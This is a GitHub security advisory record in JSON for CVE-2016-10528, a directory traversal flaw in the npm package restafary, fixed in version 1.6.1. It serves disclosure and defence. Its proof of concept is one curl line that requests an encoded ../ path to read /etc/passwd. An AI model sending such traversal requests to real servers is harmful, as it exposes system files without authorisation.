{"id":"GHSA-xg5r-8j97-2wrj","summary":"Directory Traversal in restafary","details":"Affected versions of `restafary` are susceptible to a directory traversal vulnerability when a root path is specified in the configuration.\n\n\nProof of Concept\n\n```\ncurl -i -s -k  -X 'GET' -H 'Authorization: Basic YWRtaW46cGFzc3dvcmQ=' 'http://localhost:8000/api/v1/fs/..%2f..%2fetc/passwd'\n```\n\n\n## Recommendation\n\nUpdate to version 1.6.1 or later.","aliases":["CVE-2016-10528"],"modified":"2023-11-08T03:58:10.722738Z","published":"2019-02-18T23:39:22Z","database_specific":{"nvd_published_at":null,"cwe_ids":["CWE-22"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2020-06-16T22:03:10Z"},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2016-10528"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-xg5r-8j97-2wrj"},{"type":"WEB","url":"https://www.npmjs.com/advisories/89"}],"affected":[{"package":{"name":"restafary","ecosystem":"npm","purl":"pkg:npm/restafary"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.6.1"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-xg5r-8j97-2wrj/GHSA-xg5r-8j97-2wrj.json"}}],"schema_version":"1.9.0"}